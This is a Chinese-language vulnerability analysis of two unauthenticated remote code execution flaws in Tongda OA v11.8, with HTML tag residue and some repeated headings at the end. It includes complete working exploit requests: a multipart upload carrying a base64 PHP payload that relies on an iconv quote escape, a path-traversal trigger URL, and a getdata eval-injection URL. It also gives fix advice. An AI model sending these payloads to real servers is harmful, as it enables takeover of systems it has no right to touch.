通达OA v11.8前台文件上传与命令执行漏洞分析<\/h1>

漏洞概述<\/h2>

通达OA v11.8存在两个严重的安全漏洞：<\/p>

前台文件上传漏洞（通过api.ali.php）<\/li>

前台任意命令执行漏洞（通过getdata接口）<\/li> <\/ol>

这两个漏洞均无需身份验证即可利用，攻击者可以上传恶意文件并执行任意代码，完全控制服务器。<\/p>

漏洞一：api.ali.php任意文件上传<\/h2>

影响版本<\/h3>
通达OA v11.8<\/p>

漏洞原理<\/h3>

该漏洞利用链包含两个关键部分：<\/p>

通过api.ali.php上传JSON文件（绕过文件类型限制）<\/li>

通过work.php解析JSON文件并执行其中的PHP代码<\/li> <\/ol>

漏洞复现步骤<\/h3>

1. 上传JSON文件<\/h4>

发送以下POST请求上传包含恶意代码的JSON文件：<\/p>

POST<\/span> \/mobile\/api\/api.ali.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> [target]<\/span>
<\/span><\/span>User-Agent:<\/span> Go-http-client\/1.1<\/span>
<\/span><\/span>Content-Length:<\/span> 422<\/span>
<\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=502f67681799b07e4de6b503655f5cae<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip<\/span>
<\/span><\/span>
<\/span><\/span>--502f67681799b07e4de6b503655f5cae
<\/span><\/span>Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
<\/span><\/span>Content-Type: application\/octet-stream
<\/span><\/span>
<\/span><\/span>{"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw\/cGhwIGVjaG8gdnVsbl90ZXN0Oz8+Jyk7","dataAnalysis":"{\"a\":\"錦',eval(base64_decode($BackData[a])));\/*\"}"}
<\/span><\/span>--502f67681799b07e4de6b503655f5cae--
<\/span><\/span><\/code><\/pre>其中：<\/p>

a<\/code>参数包含base64编码的PHP代码（file_put_contents('..\/fb6790f4.php','<?php echo vuln_test;?>');<\/code>）<\/li>
dataAnalysis<\/code>包含利用iconv编码转换漏洞的payload<\/li>
<\/ul>
2. 触发文件写入<\/h4>
发送GET请求触发文件写入：<\/p>
\/inc\/package\/work.php?id=..\/..\/..\/..\/..\/myoa\/attach\/approve_center\/2109\/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4
<\/code><\/pre>
成功后在webroot目录下写入fb6790f4.php文件。<\/p>
技术分析<\/h3>
文件上传部分<\/h4>

文件上传功能位于mobile\/api\/api.ali.php<\/code><\/li>
包含conn.php<\/code>、api.api.class.php<\/code>、utility_file.php<\/code>，无权限验证<\/li>
utility_file.php<\/code>中的upload()<\/code>函数处理上传：

使用filename_valid()<\/code>验证文件名<\/li>
限制php、php3、php5等危险扩展<\/li>
最终文件保存在attach\/approve_center\/[年月]<\/code>目录下<\/li>
文件名格式：随机数字+原始文件名<\/li>
<\/ul>
<\/li>
<\/ul>
文件读取与代码执行<\/h4>

触发点在\/inc\/package\/work.php<\/code><\/li>
无鉴权操作<\/li>
关键漏洞点：

路径遍历：id<\/code>参数未过滤..\/<\/code><\/li>
通配符匹配：使用>>>>>>>>>><\/code>匹配随机生成的9位数文件名<\/li>
file_get_contents()<\/code>特性：只要最后路径正确，前面可以任意跨目录<\/li>
eval()<\/code>执行：通过AllVariableBusinessProcessing<\/code>类的backDataAnalysis()<\/code>方法执行代码<\/li>
<\/ol>
<\/li>
<\/ul>
代码执行绕过技术<\/h4>

利用iconv<\/code>编码转换漏洞：

"錦"的UTF-8编码是\xE9\x8C\xA6<\/code>，GBK编码是\xB0\xA1<\/code><\/li>
转换后\xB0\xA1<\/code>与\<\/code>组合成新字符，使单引号逃逸<\/li>
<\/ul>
<\/li>
构造特殊JSON格式闭合语句：
$b =<\/span> array<\/span>(
<\/span><\/span>  'a'<\/span>=><\/span>'b'<\/span>,eval<\/span>(base64_decode<\/span>($c)));\/*<\/span>'<\/span>,
<\/span><\/span>);
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
漏洞二：getdata任意命令执行<\/h2>
漏洞位置<\/h3>
\/general\/appbuilder\/web\/portal\/gateway\/getdata<\/code><\/p>
漏洞复现Payload<\/h3>
\/general\/appbuilder\/web\/portal\/gateway\/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyB2dWxuX3Rlc3Q7%22)))%3B\/*&id=19&module=Carouselimage
<\/code><\/pre>
其中ZWNobyB2dWxuX3Rlc3Q7<\/code>解码为echo vuln_test;<\/code><\/p>
技术分析<\/h3>
权限绕过<\/h4>

web\/index.php<\/code>检查config["params"]["LOGIN_UID"]<\/code>，未登录时为""<\/code><\/li>
\/portal\/gateway\/<\/code>路径下只有\/potal\/gateway\/saveportal<\/code>需要鉴权<\/li>
<\/ul>
漏洞链<\/h4>

请求路由到modules\/portal\/controllers\/GatewayController.php<\/code><\/li>
传入module=Carouselimage<\/code>，执行$component->GetDate()<\/code><\/li>
通过id=19<\/code>查询数据库，使$comtype=1<\/code><\/li>
进入data_analysis()<\/code>方法，最终执行free_components\/AppCarouselimage.php#get_data()<\/code><\/li>
activeTab<\/code>参数未经处理直接传入eval()<\/code><\/li>
<\/ol>
代码执行原理<\/h4>

同样利用iconv<\/code>编码转换漏洞<\/li>
构造特殊字符串闭合单引号并执行任意代码<\/li>
<\/ul>
修复建议<\/h2>

对所有上传文件进行严格的内容类型检查<\/li>
对用户输入进行严格的过滤，特别是路径遍历字符和特殊符号<\/li>
对eval()<\/code>等危险函数的使用进行严格限制<\/li>
对前台接口增加身份验证<\/li>
升级到最新版本并应用所有安全补丁<\/li>
<\/ol>
总结<\/h2>
这两个漏洞展示了通达OA系统中存在的严重安全问题：<\/p>

文件上传功能缺乏足够的安全检查<\/li>
路径遍历漏洞导致任意文件读取<\/li>
不安全的反序列化和eval()<\/code>使用<\/li>
前台接口缺乏必要的权限验证<\/li>
<\/ol>
攻击者可以利用这些漏洞组合实现无需身份验证的远程代码执行，完全控制服务器。建议用户立即检查系统版本并采取防护措施。<\/p>

通达OA v11.8前台文件上传与命令执行漏洞分析<\/h1>

漏洞一：api.ali.php任意文件上传<\/h2>

影响版本<\/h3> 通达OA v11.8<\/p>

漏洞复现步骤<\/h3>

技术分析<\/h3>

漏洞二：getdata任意命令执行<\/h2>

漏洞位置<\/h3> \/general\/appbuilder\/web\/portal\/gateway\/getdata<\/code><\/p>

影响版本<\/h3>
通达OA v11.8<\/p>

漏洞位置<\/h3>
`\/general\/appbuilder\/web\/portal\/gateway\/getdata<\/code><\/p>`